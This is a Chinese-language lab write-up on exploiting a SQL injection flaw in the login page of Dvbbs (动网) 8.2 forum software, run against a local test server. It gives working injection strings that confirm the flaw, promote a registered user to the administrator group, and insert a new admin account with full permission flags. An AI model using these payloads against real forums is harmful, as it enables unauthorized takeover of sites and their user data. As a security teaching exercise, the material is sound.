动网8.2版本的注入漏洞的利用

【实验原理】
动网8.2在用户登录时,过滤不严,可以导致注入,提升权限。漏洞存在源程序的login.asp文件。

【实验步骤】
一、正常注册登录
1.1访问地址:http://192.168.1.3:8010/。
动网8.2版本的注入漏洞的利用_第1张图片
1.2 首先我们注册一个用户:san,密码:123456。
动网8.2版本的注入漏洞的利用_第2张图片
二、漏洞测试与利用
2.1 然后退出san用户,打开登录页面。
动网8.2版本的注入漏洞的利用_第3张图片
2.2使用以下语句登录:san’ and ‘a’=’a 密码:1234567。
动网8.2版本的注入漏洞的利用_第4张图片
2.3使用以下语句再次登录:san’ and ‘a’=’b,密码:1234567。
动网8.2版本的注入漏洞的利用_第5张图片
2.4 提示用户不存在,说明以上语句启作用了,输入语句:’;update dv_user set usergroupid=1 where username=’san’–。
动网8.2版本的注入漏洞的利用_第6张图片
2.5提示用户名不存在,但是我们再次使用正确的用户名密码san:123456登录。在“控制面板-我能做什么”中可以看到san用户已属于管理员组用户。
动网8.2版本的注入漏洞的利用_第7张图片
2.6 可以看到,san用户已经是前台管理员组的身份了。退出,我们再次使用以下语句登录,密码为正确密码:san’;insert into dv_admin (username,password,flag,adduser) values(‘san’,’49ba59abbe56e057’,’1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45’,’san’)–
注意:49ba59abbe56e057是123456的cmd16位密文

2.7 我们打开管理员界面http://192.168.1.3:8010/admin,使用san以及密码123456登录。发现可以成功登陆。
动网8.2版本的注入漏洞的利用_第8张图片

你可能感兴趣的:(动网8.2版本的注入漏洞的利用)